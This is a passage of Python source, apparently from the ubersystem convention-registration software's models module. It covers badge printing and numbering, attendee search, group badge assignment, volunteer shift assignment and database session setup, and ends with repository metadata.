import PrintJob\n fields = [\n 'badge_printed_name',\n 'badge_num',\n 'badge_type_label',\n 'ribbon_labels',\n ]\n \n errors = []\n if not printer_id:\n errors.append(\"Printer ID not set.\")\n\n if not reg_station:\n errors.append(\"Reg station number not set.\")\n\n if print_fee is None and attendee.times_printed > 0:\n errors.append(\"Please specify what reprint fee to charge this attendee, including $0.\")\n \n if not attendee.birthdate:\n errors.append(\"Attendee is missing a date of birth.\")\n elif not attendee.age_now_or_at_con:\n errors.append(\"Attendee's date of birth is not recognized as a date.\")\n\n attendee_fields = attendee.to_dict(fields)\n\n for field in fields:\n if not attendee_fields.get(field) and field != 'ribbon_labels':\n errors.append(\"Field missing: {}.\".format(field))\n\n if self.query(PrintJob).filter_by(attendee_id=attendee.id, printed=None, errors=\"\").first():\n errors.append(\"Badge is already queued to print.\")\n\n if errors:\n return None, errors\n\n if dry_run:\n return None, None\n\n print_job = PrintJob(attendee_id = attendee.id, \n admin_id = self.current_admin_account().id,\n admin_name = self.admin_attendee().full_name,\n printer_id = printer_id,\n reg_station = reg_station,\n print_fee = print_fee)\n\n if attendee.age_now_or_at_con >= 18:\n print_job.is_minor = False\n else:\n print_job.is_minor = True\n \n json_data = attendee_fields\n del json_data['_model']\n json_data['attendee_id'] = json_data.pop('id')\n print_job.json_data = json_data\n \n self.add(print_job)\n self.commit()\n\n return print_job.id, None\n\n def update_badge_print_job(self, id):\n job = self.print_job(id)\n attendee = job.attendee\n\n errors = []\n\n if attendee.age_group_conf['val'] == c.AGE_UNKNOWN:\n errors.append(\"Attendee no longer has an age group.\")\n else:\n if attendee.age_now_or_at_con < 18 and not job.is_minor:\n errors.append(\"Attendee is now under 18, please requeue badge.\")\n if attendee.age_now_or_at_con >= 18 and job.is_minor:\n errors.append(\"Attendee is no longer under 18, please requeue badge.\")\n \n fields = ['badge_num', 'badge_type_label', 'ribbon_labels', 'badge_printed_name']\n attendee_fields = attendee.to_dict(fields)\n\n for field in fields:\n if not attendee_fields.get(field) and field != 'ribbon_labels':\n errors.append(\"Field missing: {}.\".format(field))\n elif attendee_fields.get(field) != job.json_data.get(field):\n job.json_data[field] = attendee_fields.get(field)\n\n if not errors:\n self.add(job)\n self.commit()\n\n return errors\n\n def get_next_badge_num(self, badge_type):\n \"\"\"\n Returns the next badge available for a given badge type. 
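# A standalone sketch of the gap-filling badge-number search described here
# and implemented by auto_badge_num below, assuming taken numbers are plain
# ints (next_badge_num is a hypothetical helper, not part of the model):
def next_badge_num(taken, lower, upper):
    in_range = sorted(n for n in taken if lower <= n <= upper)
    if not in_range:
        return lower
    gaps = sorted(set(range(lower, in_range[-1] + 1)) - set(in_range))
    return gaps[0] if gaps else in_range[-1] + 1

assert next_badge_num([1, 2, 5], 1, 100) == 3   # fills the first gap
assert next_badge_num([1, 2, 3], 1, 100) == 4   # no gap: latest + 1
assert next_badge_num([], 10, 20) == 10         # empty range starts at the bottom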
This is\n essentially a wrapper for auto_badge_num that accounts for new or\n changed objects in the session.\n\n Args:\n badge_type: Used to pass to auto_badge_num and to ignore\n objects in the session that aren't within the badge\n type's range.\n\n \"\"\"\n badge_type = uber.badge_funcs.get_real_badge_type(badge_type)\n\n new_badge_num = self.auto_badge_num(badge_type)\n lower_bound = c.BADGE_RANGES[badge_type][0]\n upper_bound = c.BADGE_RANGES[badge_type][1]\n\n # Adjusts the badge number based on badges in the session\n all_models = chain(self.new, self.dirty)\n for attendee in [m for m in all_models if isinstance(m, Attendee)]:\n if attendee.badge_num is not None and lower_bound <= attendee.badge_num <= upper_bound:\n new_badge_num = max(new_badge_num, 1 + attendee.badge_num)\n\n assert new_badge_num < upper_bound, 'There are no more badge numbers available in this range!'\n\n return new_badge_num\n\n def update_badge(self, attendee, old_badge_type, old_badge_num):\n \"\"\"\n This should be called whenever an attendee's badge type or badge\n number is changed. It checks if the attendee will still require a\n badge number with their new badge type, and if so, sets their\n number to either the number specified by the admin or the lowest\n available badge number in that range.\n\n Args:\n attendee: The Attendee() object whose badge is being changed.\n old_badge_type: The old badge type.\n old_badge_num: The old badge number.\n\n \"\"\"\n from uber.badge_funcs import needs_badge_num\n\n if c.SHIFT_CUSTOM_BADGES and c.BEFORE_PRINTED_BADGE_DEADLINE and not c.AT_THE_CON:\n badge_collision = False\n if attendee.badge_num:\n badge_collision = self.query(Attendee.badge_num).filter(\n Attendee.badge_num == attendee.badge_num,\n Attendee.id != attendee.id).first()\n\n desired_badge_num = attendee.badge_num\n if old_badge_num:\n if attendee.badge_num and badge_collision:\n if old_badge_type == attendee.badge_type:\n if old_badge_num < attendee.badge_num:\n self.shift_badges(\n old_badge_type, old_badge_num + 1, until=attendee.badge_num, down=True)\n else:\n self.shift_badges(old_badge_type, attendee.badge_num, until=old_badge_num - 1, up=True)\n else:\n self.shift_badges(old_badge_type, old_badge_num + 1, down=True)\n self.shift_badges(attendee.badge_type, attendee.badge_num, up=True)\n else:\n self.shift_badges(old_badge_type, old_badge_num + 1, down=True)\n\n elif attendee.badge_num and badge_collision:\n self.shift_badges(attendee.badge_type, attendee.badge_num, up=True)\n\n attendee.badge_num = desired_badge_num\n\n if not attendee.badge_num and needs_badge_num(attendee):\n attendee.badge_num = self.get_next_badge_num(attendee.badge_type)\n\n return 'Badge updated'\n\n def auto_badge_num(self, badge_type):\n \"\"\"\n Gets the next available badge number for a badge type's range.\n\n Plugins can override the logic here if need be without worrying\n about handling dirty sessions.\n\n Args:\n badge_type: Used as a starting point if no badges of the same\n type exist, and to select badges within a specific range.\n\n \"\"\"\n in_range = self.query(Attendee.badge_num).filter(\n Attendee.badge_num != None, # noqa: E711\n Attendee.badge_num >= c.BADGE_RANGES[badge_type][0],\n Attendee.badge_num <= c.BADGE_RANGES[badge_type][1])\n\n in_range_list = [int(row[0]) for row in in_range.order_by(Attendee.badge_num)]\n\n if len(in_range_list):\n # Searches badge range for a gap in badge numbers; if none\n # found, returns the latest badge number + 1.\n # Doing this lets admins manually set high badge 
numbers\n # without filling up the badge type's range.\n start, end = c.BADGE_RANGES[badge_type][0], in_range_list[-1]\n gap_nums = sorted(set(range(start, end + 1)).difference(in_range_list))\n\n if not gap_nums:\n return end + 1\n else:\n return gap_nums[0]\n else:\n return c.BADGE_RANGES[badge_type][0]\n\n def shift_badges(self, badge_type, badge_num, *, until=None, up=False, down=False):\n\n if not c.SHIFT_CUSTOM_BADGES or c.AFTER_PRINTED_BADGE_DEADLINE or c.AT_THE_CON:\n return False\n\n from uber.badge_funcs import get_badge_type\n (calculated_badge_type, error) = get_badge_type(badge_num)\n badge_type = calculated_badge_type or badge_type\n until = until or c.BADGE_RANGES[badge_type][1]\n\n shift = 1 if up else -1\n query = self.query(Attendee).filter(\n Attendee.badge_num != None, # noqa: E711\n Attendee.badge_num >= badge_num,\n Attendee.badge_num <= until)\n\n query.update({Attendee.badge_num: Attendee.badge_num + shift}, synchronize_session='evaluate')\n\n return True\n \n def get_next_badge_to_print(self, printer_id=''):\n query = self.query(PrintJob).join(Tracking, PrintJob.id == Tracking.fk_id).filter(\n PrintJob.printed == None, PrintJob.errors == '', PrintJob.printer_id == printer_id)\n\n badge = query.order_by(Tracking.when.desc()).with_for_update().first()\n\n return badge\n\n def valid_attendees(self):\n return self.query(Attendee).filter(Attendee.is_valid == True)\n\n def attendees_with_badges(self):\n return self.query(Attendee).filter(Attendee.has_badge == True)\n\n def all_attendees(self, only_staffing=False, pending=False):\n \"\"\"\n Returns a Query of Attendees with efficient loading for groups and\n shifts/jobs.\n\n In some cases we only want to return attendees where \"staffing\"\n is true, because before the event people can't sign up for shifts\n unless they're marked as volunteers. However, on-site we relax\n that restriction, so we'll get attendees with shifts who are not\n actually marked as staffing. 
We therefore have an optional\n parameter for clients to indicate that all attendees should be\n returned.\n \"\"\"\n staffing_filter = [Attendee.staffing == True] if only_staffing else [] # noqa: E712\n\n badge_statuses = [c.NEW_STATUS, c.COMPLETED_STATUS]\n if pending:\n badge_statuses.append(c.PENDING_STATUS)\n\n badge_filter = Attendee.badge_status.in_(badge_statuses)\n\n return self.query(Attendee) \\\n .filter(badge_filter, *staffing_filter) \\\n .options(\n subqueryload(Attendee.dept_memberships),\n subqueryload(Attendee.group),\n subqueryload(Attendee.shifts).subqueryload(Shift.job).subqueryload(Job.department),\n subqueryload(Attendee.room_assignments)) \\\n .order_by(Attendee.full_name, Attendee.id)\n\n def staffers(self, pending=False):\n return self.all_attendees(only_staffing=True, pending=pending)\n\n def all_panelists(self):\n return self.query(Attendee).filter(or_(\n Attendee.ribbon.contains(c.PANELIST_RIBBON),\n Attendee.badge_type == c.GUEST_BADGE)).order_by(Attendee.full_name).all()\n\n @department_id_adapter\n def jobs(self, department_id=None):\n job_filter = {'department_id': department_id} if department_id else {}\n\n return self.query(Job).filter_by(**job_filter) \\\n .options(\n subqueryload(Job.department),\n subqueryload(Job.required_roles),\n subqueryload(Job.shifts).subqueryload(Shift.attendee).subqueryload(Attendee.group)) \\\n .order_by(Job.start_time, Job.name)\n\n def staffers_for_dropdown(self):\n query = self.query(Attendee.id, Attendee.full_name)\n return [\n {'id': id, 'full_name': full_name.title()}\n for id, full_name in query.filter_by(staffing=True).order_by(Attendee.full_name)]\n\n @department_id_adapter\n def dept_heads(self, department_id=None):\n if department_id:\n return self.query(Department).get(department_id).dept_heads\n return self.query(Attendee).filter(Attendee.dept_memberships.any(is_dept_head=True)) \\\n .order_by(Attendee.full_name).all()\n\n def match_to_group(self, attendee, group):\n available = [a for a in group.attendees if a.is_unassigned]\n if not available:\n return 'The last badge for that group has already been assigned by another station'\n\n matching = [a for a in available if a.badge_type == attendee.badge_type]\n if not matching:\n return 'Badge #{} is a {} badge, but {} has no badges of that type'.format(\n attendee.badge_num, attendee.badge_type_label, group.name)\n else:\n # First preserve the attributes to copy to the new group member\n attrs = matching[0].to_dict(attrs=['group', 'group_id', 'paid', 'ribbon'])\n\n # Then delete the old unassigned group member\n self.delete(matching[0])\n\n # Flush the deletion so the badge shifting code is performed\n self.flush()\n\n # Copy the attributes we preserved\n attendee.apply(attrs, restricted=False)\n\n # Ensure the attendee is added to the session\n self.add(attendee)\n self.commit()\n\n def get_truth(self, left, op, right):\n # Helper function for use in attribute and property search\n return op(left, right)\n\n def parse_attr_search_terms(self, search_text):\n # Parse the search terms, including accounting for prefixes like >, <, and !=\n # Returns the target attr/property name, the search term with and without AND/OR, and the operator\n target, term = search_text.split(':', 1)\n target, term = target.strip(), term.strip()\n search_term = term.replace('AND', '').replace('OR', '').strip()\n\n if search_term[0] in ['>', '<', '!']:\n if search_term[0] == '!':\n op = operator.ne\n\n if search_term[1] == '=':\n if search_term[0] == '>':\n op = operator.ge\n elif 
search_term[0] == '<':\n op = operator.le\n search_term = search_term[2:]\n else:\n if search_term[0] == '>':\n op = operator.gt\n elif search_term[0] == '<':\n op = operator.lt\n search_term = search_term[1:]\n else:\n op = operator.eq\n \n return target, term, search_term, op\n\n def search(self, text, *filters):\n # We need to both outerjoin on the PromoCodeGroup table and also\n # query it. In order to do this we need to alias it so that the\n # reference to PromoCodeGroup in the joinedload doesn't conflict\n # with the outerjoin. See https://docs.sqlalchemy.org/en/13/orm/query.html#sqlalchemy.orm.query.Query.join\n aliased_pcg = aliased(PromoCodeGroup)\n\n attendees = self.query(Attendee) \\\n .outerjoin(Attendee.group) \\\n .outerjoin(Attendee.promo_code) \\\n .outerjoin(Attendee.managers) \\\n .outerjoin(aliased_pcg, PromoCode.group) \\\n .options(\n joinedload(Attendee.group),\n joinedload(Attendee.promo_code).joinedload(PromoCode.group)\n ).filter(*filters)\n\n terms = text.split()\n if len(terms) == 2:\n first, last = terms\n if first.endswith(','):\n last, first = first.strip(','), last\n name_cond = attendees.icontains_condition(first_name=first, last_name=last)\n legal_name_cond = attendees.icontains_condition(legal_name=\"{}%{}\".format(first, last))\n first_name_cond = attendees.icontains_condition(first_name=terms)\n last_name_cond = attendees.icontains_condition(last_name=terms)\n if attendees.filter(or_(name_cond, legal_name_cond, first_name_cond, last_name_cond)).first():\n return attendees.filter(or_(name_cond, legal_name_cond, first_name_cond, last_name_cond)), ''\n\n elif len(terms) == 1 and terms[0].endswith(','):\n last = terms[0].rstrip(',')\n name_cond = attendees.icontains_condition(last_name=last)\n # Known issue: search includes first name if legal name is set\n legal_cond = attendees.icontains_condition(legal_name=last)\n return attendees.filter(or_(name_cond, legal_cond)), ''\n\n elif len(terms) == 1 and terms[0].isdigit():\n if len(terms[0]) == 10:\n return attendees.filter(or_(Attendee.ec_phone == terms[0], Attendee.cellphone == terms[0])), ''\n elif int(terms[0]) <= sorted(\n c.BADGE_RANGES.items(),\n key=lambda badge_range: badge_range[1][0])[-1][1][1]:\n return attendees.filter(Attendee.badge_num == terms[0]), ''\n\n elif len(terms) == 1 \\\n and re.match('^[a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12}$', terms[0]):\n\n return attendees.filter(or_(\n Attendee.id == terms[0],\n Attendee.public_id == terms[0],\n aliased_pcg.id == terms[0],\n Group.id == terms[0],\n Group.public_id == terms[0])), ''\n\n elif len(terms) == 1 and terms[0].startswith(c.EVENT_QR_ID):\n search_uuid = terms[0][len(c.EVENT_QR_ID):]\n if re.match('^[a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12}$', search_uuid):\n return attendees.filter(or_(\n Attendee.public_id == search_uuid,\n Group.public_id == search_uuid)), ''\n\n or_checks = []\n and_checks = []\n\n def check_text_fields(search_text):\n check_list = [\n Group.name.ilike('%' + search_text + '%'),\n aliased_pcg.name.ilike('%' + search_text + '%')\n ]\n\n for attr in Attendee.searchable_fields:\n check_list.append(getattr(Attendee, attr).ilike('%' + search_text + '%'))\n \n return check_list\n\n if ':' in text:\n delimited_text = text.replace('AND', 'AND,').replace('OR', 'OR,')\n list_of_attr_searches = delimited_text.split(',')\n last_term = None\n\n for search_text in list_of_attr_searches:\n if ':' not in search_text:\n last_term = search_text\n search_text = search_text.replace('AND', 
'').replace('OR', '').strip()\n or_checks.extend(check_text_fields(search_text))\n else:\n target, term, search_term, op = self.parse_attr_search_terms(search_text)\n\n if target == 'email':\n attr_search_filter = Attendee.normalized_email.contains(normalize_email_legacy(search_term))\n elif target == 'account_email':\n attr_search_filter = AttendeeAccount.normalized_email.contains(normalize_email_legacy(search_term))\n elif target == 'group':\n attr_search_filter = Group.normalized_name.contains(search_term.strip().lower())\n elif target == 'has_ribbon':\n attr_search_filter = Attendee.ribbon == Attendee.ribbon.type.convert_if_labels(search_term.title())\n elif target in Attendee.searchable_bools:\n t_or_f = search_term.strip().lower() not in ('f', 'false', 'n', 'no', '0', 'none')\n attr_search_filter = getattr(Attendee,target) == t_or_f\n\n if not isinstance(getattr(Attendee, target).type, Boolean):\n attr_search_filter = getattr(Attendee,target) != None \\\n if t_or_f == True else getattr(Attendee,target) == None\n elif target in Attendee.searchable_choices:\n if target == 'amount_extra':\n # Allow searching kick-in by dollar value and not just the label\n try:\n search_term = int(search_term.replace('$',''))\n except:\n pass\n else:\n try:\n search_term = getattr(Attendee,target).type.convert_if_label(search_term)\n except KeyError:\n # A lot of our labels are title-cased\n try:\n search_term = getattr(Attendee,target).type.convert_if_label(search_term.title())\n except KeyError:\n return None, 'ERROR: {} is not a valid option for {}'.format(search_term, target)\n attr_search_filter = self.get_truth(getattr(Attendee,target), op, search_term)\n else:\n try:\n getattr(Attendee,target)\n except AttributeError:\n return None, 'ERROR: {} is not a valid attribute'.format(target)\n # Are we a searchable property?\n if isinstance(getattr(Attendee,target) == search_term, sqlalchemy.sql.elements.BinaryExpression):\n attr_search_filter = self.get_truth(getattr(Attendee,target), op, search_term)\n else:\n return None, 'ERROR: {} is not a searchable attribute'.format(target)\n \n if term.endswith(' OR') or last_term and last_term.endswith(' OR'):\n or_checks.append(attr_search_filter)\n else:\n and_checks.append(attr_search_filter)\n\n last_term = term\n else:\n or_checks.extend(check_text_fields(text))\n \n if or_checks and and_checks:\n return attendees.filter(or_(*or_checks), and_(*and_checks)), ''\n elif or_checks:\n return attendees.filter(or_(*or_checks)), ''\n elif and_checks:\n return attendees.filter(and_(*and_checks)), ''\n else:\n return attendees, ''\n\n def property_search(self, text):\n \"\"\"\n Many of our most useful forms of data are properties on the Attendee model.\n However, these often are too complex to create SQL statements for, so we\n can't use them in regular attendee attribute search. Our workaround for this\n has been either creating custom reports or making sysadmins cry. This is our\n quick-ish solution -- a way to filter attendees by any property. 
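# The prefix parsing in parse_attr_search_terms above can be sketched in
# isolation; this simplified version handles only the comparison prefixes
# shown there (>=, <=, !=, >, <, !) and is not the method itself:
import operator

def parse_op(term):
    prefixes = {'>=': operator.ge, '<=': operator.le, '!=': operator.ne,
                '>': operator.gt, '<': operator.lt, '!': operator.ne}
    for prefix, op in prefixes.items():  # two-char prefixes are checked first
        if term.startswith(prefix):
            return op, term[len(prefix):].strip()
    return operator.eq, term.strip()

op, value = parse_op('>=18')
assert op is operator.ge and value == '18'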
Because this is\n        resource-intensive, it is locked behind the Devtools site section.\n        \"\"\"\n        if \"OR\" in text:\n            return None, 'Sorry, property search does not support OR conditions because we don\'t want to install Pandas.'\n        delimited_text = text.replace('AND', 'AND,')\n        list_of_attr_searches = delimited_text.split(',')\n        last_term = None\n\n        conditions_list = []\n        results = []\n\n        for search_text in list_of_attr_searches:\n            target, term, search_term, op = self.parse_attr_search_terms(search_text)\n            try:\n                search_term = int(search_term)\n            except Exception:\n                pass\n            conditions_list.append((target, search_term, op))\n\n        for attendee in self.valid_attendees():\n            if all([self.get_truth(getattr(attendee, target), op, search_term) for target, search_term, op in conditions_list]):\n                results.append(attendee)\n        \n        return results, ''\n\n    def delete_from_group(self, attendee, group):\n        \"\"\"\n        Sometimes we want to delete an attendee badge which is part of a\n        group. In most cases, we could just say \"session.delete(attendee)\"\n        but sometimes we need to make sure that the attendee is ALSO\n        removed from the \"group.attendees\" list before we commit, since the\n        number of attendees in a group is used in our presave_adjustments()\n        code to update the group price. So anytime we delete an attendee\n        in a group, we should use this method.\n        \"\"\"\n        self.delete(attendee)\n        group.attendees.remove(attendee)\n\n    def assign_badges(\n            self, group, new_badge_count, new_badge_type=c.ATTENDEE_BADGE,\n            new_ribbon_type=None, paid=c.PAID_BY_GROUP,\n            **extra_create_args):\n\n        diff = int(new_badge_count) - group.badges\n        sorted_unassigned = sorted(group.floating, key=lambda a: a.registered, reverse=True)\n        ribbon_to_use = ','.join(map(str, listify(new_ribbon_type))) if new_ribbon_type else group.new_ribbon\n\n        if int(new_badge_type) in c.PREASSIGNED_BADGE_TYPES and c.AFTER_PRINTED_BADGE_DEADLINE and diff > 0:\n            return 'Custom badges have already been ordered, so you will need to select a different badge type'\n        elif diff > 0:\n            for i in range(diff):\n                new_attendee = Attendee(\n                    badge_type=new_badge_type,\n                    ribbon=ribbon_to_use,\n                    paid=paid,\n                    **extra_create_args)\n                group.attendees.append(new_attendee)\n            \n        elif diff < 0:\n            if len(group.floating) < abs(diff):\n                return 'You cannot reduce the number of badges for a group to below the number of assigned badges'\n            else:\n                for attendee in sorted_unassigned[:abs(diff)]:\n                    self.delete_from_group(attendee, group)\n\n    def assign(self, attendee_id, job_id):\n        \"\"\"\n        assign an Attendee to a Job by creating a Shift\n        :return: 'None' on success, error message on failure\n        \"\"\"\n        job = self.job(job_id)\n        attendee = self.attendee(attendee_id)\n\n        if not attendee.has_required_roles(job):\n            return 'You cannot assign an attendee to this shift who does not have the required roles: {}'.format(\n                job.required_roles_labels)\n\n        if job.slots <= len(job.shifts):\n            return 'All slots for this job have already been filled'\n\n        if not job.no_overlap(attendee):\n            return 'This volunteer is already signed up for a shift during that time'\n\n        if not job.working_limit_ok(attendee):\n            return 'This shift would put this volunteer over one of their department\'s max consecutive hours'\n\n        self.add(Shift(attendee=attendee, job=job))\n        self.commit()\n\n    def insert_test_admin_account(self):\n        \"\"\"\n        Insert a test admin into the database with username\n        \"magfest@example.com\" and password \"magfest\". This is ONLY allowed if\n        no other admins already exist in the database.\n\n        Returns:\n            bool: 
True if success, False if failure\n        \"\"\"\n        if self.query(AdminAccount).first() is not None:\n            return False\n\n        attendee = Attendee(\n            placeholder=True,\n            first_name='Test',\n            last_name='Developer',\n            email=c.TEST_ADMIN_EMAIL,\n            badge_type=c.ATTENDEE_BADGE,\n        )\n        self.add(attendee)\n\n        all_access_group = AccessGroup(\n            name='All Access',\n            access={section: '5' for section in c.ADMIN_PAGES}\n        )\n\n        test_developer_account = AdminAccount(\n            attendee=attendee,\n        )\n\n        if not c.SAML_SETTINGS:\n            test_developer_account.hashed = bcrypt.hashpw('magfest', bcrypt.gensalt())\n        \n        test_developer_account.access_groups.append(all_access_group)\n\n        self.add(all_access_group)\n        self.add(test_developer_account)\n        self.commit()\n\n        return True\n\n    def set_relation_ids(self, instance, field, cls, value):\n        values = set(s for s in listify(value) if s and s != 'None')\n        relations = self.query(cls).filter(cls.id.in_(values)).all() if values else []\n        setattr(instance, field, relations)\n\n    def bulk_insert(self, models):\n        \"\"\"\n        Convenience method for bulk inserting model objects.\n\n        In general, doing a bulk insert is much faster than individual\n        inserts, but the whole insert will fail if a single object\n        violates the database's referential integrity.\n\n        This function does a bulk insert, but if an `IntegrityError` is\n        encountered, it falls back to inserting the model objects\n        one-by-one, and ignores the individual integrity errors.\n\n        Arguments:\n            models (list): A list of sqlalchemy model objects.\n\n        Returns:\n            list: A list of model objects that were successfully inserted.\n                The returned list will not include any model objects that\n                failed insertion.\n        \"\"\"\n        for model in models:\n            model.presave_adjustments()\n        try:\n            self.bulk_save_objects(models)\n            self.commit()\n            return models\n        except IntegrityError as error:\n            log.debug('Bulk insert failed: {}', error)\n            self.rollback()\n\n            # Bulk insert failed, so insert one at a time and ignore errors\n            inserted_models = []\n            for model in models:\n                try:\n                    self.add(model)\n                    self.commit()\n                    inserted_models.append(model)\n                except IntegrityError as error:\n                    log.debug('Individual insert failed: {}', error)\n                    # Ignore db integrity errors\n                    self.rollback()\n            return inserted_models\n\n    # ========================\n    # mivs\n    # ========================\n\n    def logged_in_studio(self):\n        try:\n            return self.indie_studio(cherrypy.session.get('studio_id'))\n        except Exception:\n            raise HTTPRedirect('../mivs/studio')\n\n    def logged_in_judge(self):\n        judge = self.admin_attendee().admin_account.judge\n        if judge:\n            return judge\n        else:\n            raise HTTPRedirect(\n                '../accounts/homepage?message={}',\n                'You have been given judge access but not had a judge entry created for you - '\n                'please contact a MIVS admin to correct this.')\n\n    def code_for(self, game):\n        if game.unlimited_code:\n            return game.unlimited_code\n        else:\n            for code in self.logged_in_judge().codes:\n                if code.game == game:\n                    return code\n\n    def delete_screenshot(self, screenshot):\n        self.delete(screenshot)\n        try:\n            os.remove(screenshot.filepath)\n        except Exception:\n            pass\n        self.commit()\n\n    def indie_judges(self):\n        return self.query(IndieJudge).join(IndieJudge.admin_account).join(AdminAccount.attendee) \\\n            .order_by(Attendee.full_name)\n\n    def indie_games(self):\n        return self.query(IndieGame).join(IndieStudio).options(\n            joinedload(IndieGame.studio), joinedload(IndieGame.reviews)).order_by(IndieStudio.name, IndieGame.title)\n\n    # =========================\n    # mits\n    # =========================\n\n    def log_in_as_mits_team(\n            self, 
team_id, redirect_to='../mits/index'):\n        try:\n            team = self.mits_team(team_id)\n            duplicate_teams = []\n            while team.duplicate_of:\n                duplicate_teams.append(team.id)\n                team = self.mits_team(team.duplicate_of)\n                assert team.id not in duplicate_teams, 'circular reference in duplicate_of: {}'.format(\n                    duplicate_teams)\n        except Exception:\n            log.error('attempt to log into invalid team {}', team_id, exc_info=True)\n            raise HTTPRedirect('../mits/login_explanation')\n        else:\n            cherrypy.session['mits_team_id'] = team.id\n            raise HTTPRedirect(redirect_to)\n\n    def logged_in_mits_team(self):\n        try:\n            team = self.mits_team(cherrypy.session.get('mits_team_id'))\n            assert not team.deleted or team.duplicate_of\n        except Exception:\n            raise HTTPRedirect('../mits/login_explanation')\n        else:\n            if team.duplicate_of:\n                # The currently-logged-in team was deleted, so log\n                # back in as the correct team.\n                self.log_in_as_mits_team(team.id)\n            else:\n                return team\n\n    def mits_teams(self, include_deleted=False):\n        if include_deleted:\n            deleted_filter = []\n        else:\n            deleted_filter = [MITSTeam.deleted == False]  # noqa: E712\n        return self.query(MITSTeam).filter(*deleted_filter).options(\n            joinedload(MITSTeam.applicants).subqueryload(MITSApplicant.attendee),\n            joinedload(MITSTeam.games),\n            joinedload(MITSTeam.schedule),\n        ).order_by(MITSTeam.name)\n\n    def delete_mits_file(self, model):\n        try:\n            os.remove(model.filepath)\n        except Exception:\n            log.error('Unexpected error deleting MITS file {}', model.filepath)\n\n        # Regardless of whether removing the file from the\n        # filesystem succeeded, we still want to delete it from the\n        # database. The most likely cause of failure is if the file\n        # was already deleted or is otherwise not present, so it\n        # wouldn't make sense to keep the database record around.\n        self.delete(model)\n        self.commit()\n\n    # =========================\n    # panels\n    # =========================\n\n    def panel_apps(self):\n        return self.query(PanelApplication).order_by('applied').all()\n\n    def panel_applicants(self):\n        return self.query(PanelApplicant).options(joinedload(PanelApplicant.application)) \\\n            .order_by('first_name', 'last_name')\n\n    # =========================\n    # tabletop\n    # =========================\n\n    def entrants(self):\n        return self.query(TabletopEntrant).options(\n            joinedload(TabletopEntrant.reminder),\n            joinedload(TabletopEntrant.attendee),\n            subqueryload(TabletopEntrant.tournament).subqueryload(TabletopTournament.event))\n\n    def entrants_by_phone(self):\n        entrants = defaultdict(list)\n        for entrant in self.entrants():\n            cellphone = normalize_phone(entrant.attendee.cellphone)\n            entrants[cellphone].append(entrant)\n        return entrants\n\n    @classmethod\n    def model_mixin(cls, model):\n        if model.__name__ in ['SessionMixin', 'QuerySubclass']:\n            target = getattr(cls, model.__name__)\n        else:\n            for target in cls.all_models():\n                if target.__name__ == model.__name__:\n                    break\n            else:\n                raise ValueError('No existing model with name {}'.format(model.__name__))\n\n        for name in dir(model):\n            if not name.startswith('_'):\n                attr = getattr(model, name)\n                if hasattr(target, '__table__') and name in target.__table__.c:\n                    attr.key = attr.key or name\n                    attr.name = attr.name or name\n                    attr.table = target.__table__\n                    target.__table__.c.replace(attr)\n                else:\n                    setattr(target, name, attr)\n        return target\n\n\n@on_startup(priority=1)\ndef initialize_db(modify_tables=False):\n    \"\"\"\n    Initialize the session on startup.\n\n    We want to do this only after all other plugins have had a chance to\n    initialize and add their 
'mixin' data (i.e. extra columns) into the models.\n\n Also, it's possible that the DB is still initializing and isn't ready to\n accept connections, so, if this fails, keep trying until we're able to\n connect.\n\n This should be the ONLY spot (except for maintenance tools) in all of core\n ubersystem or any plugins that attempts to create tables by passing\n drop=True or modify_tables=True or initialize=True to\n Session.initialize_db()\n \"\"\"\n num_tries_remaining = 10\n while not stopped.is_set():\n try:\n Session.initialize_db(modify_tables=modify_tables, initialize=True)\n except KeyboardInterrupt:\n log.critical('DB initialize: Someone hit Ctrl+C while we were starting up')\n except Exception:\n num_tries_remaining -= 1\n if num_tries_remaining == 0:\n log.error(\"DB initialize: couldn't connect to DB, we're giving up\")\n raise\n log.error(\"DB initialize: can't connect to / initialize DB, will try again in 5 seconds\", exc_info=True)\n stopped.wait(5)\n else:\n break\n\n\n@on_startup\ndef _attendee_validity_check():\n orig_getter = Session.SessionMixin.attendee\n\n @wraps(orig_getter)\n def with_validity_check(self, *args, **kwargs):\n allow_invalid = kwargs.pop('allow_invalid', False)\n attendee = orig_getter(self, *args, **kwargs)\n if not allow_invalid and not attendee.is_new and \\\n not self.current_admin_account and not attendee.is_valid:\n raise HTTPRedirect('../preregistration/invalid_badge?id={}', attendee.id)\n else:\n return attendee\n Session.SessionMixin.attendee = with_validity_check\n\n\ndef _presave_adjustments(session, context, instances='deprecated'):\n for model in chain(session.dirty, session.new):\n model.presave_adjustments()\n for model in session.deleted:\n model.predelete_adjustments()\n\n\ndef _track_changes(session, context, instances='deprecated'):\n states = [\n (c.CREATED, session.new),\n (c.UPDATED, session.dirty),\n (c.DELETED, session.deleted)]\n\n for action, instances in states:\n for instance in instances:\n if instance.__class__ not in Tracking.UNTRACKED:\n Tracking.track(action, instance)\n\n\ndef register_session_listeners():\n \"\"\"\n The order in which we register these listeners matters.\n \"\"\"\n listen(Session.session_factory, 'before_flush', _presave_adjustments)\n listen(Session.session_factory, 'after_flush', _track_changes)\n\n\nregister_session_listeners()\n","repo_name":"magfest/ubersystem","sub_path":"uber/models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":95323,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"3"}
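# A minimal, self-contained sketch of the bulk-insert-with-fallback pattern that
# bulk_insert() above implements, redone with stdlib sqlite3 so it runs anywhere
# (the table and rows are invented for the demo):
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE badge (id INTEGER PRIMARY KEY, name TEXT)")
rows = [(1, "a"), (2, "b"), (2, "dupe"), (3, "c")]  # (2, "dupe") violates the PK

try:
    with conn:  # one transaction: all-or-nothing, like bulk_save_objects + commit
        conn.executemany("INSERT INTO badge VALUES (?, ?)", rows)
except sqlite3.IntegrityError:
    inserted = []
    for row in rows:  # fall back to row-by-row, skipping only the offenders
        try:
            with conn:
                conn.execute("INSERT INTO badge VALUES (?, ?)", row)
            inserted.append(row)
        except sqlite3.IntegrityError:
            pass
    print(inserted)  # [(1, 'a'), (2, 'b'), (3, 'c')]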
